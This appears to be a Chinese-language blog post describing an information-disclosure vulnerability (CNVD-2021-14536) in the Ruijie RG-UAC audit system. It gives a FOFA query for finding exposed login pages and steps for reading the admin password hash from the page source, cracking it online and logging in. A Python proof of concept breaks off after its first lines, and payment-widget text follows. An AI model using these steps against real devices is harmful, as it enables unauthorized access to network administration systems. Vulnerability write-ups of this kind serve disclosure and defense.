锐捷 RG-UAC 统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)

0x01 漏洞描述

锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台

0x02 漏洞影响

锐捷RG-UAC统一上网行为管理审计系统

0x03 漏洞复现

使用FOFA语句包含关键字查找FOFA语句

title="RG-UAC登录页面" && body="admin"

在这里插入图片描述
登录界面
在这里插入图片描述
直接CTRL+U查看源代码,搜索password
在这里插入图片描述
https://www.somd5.com/ 解密MD5加密的password

即可使用admin,密码登录进系统后台
POC:

import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    prin
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值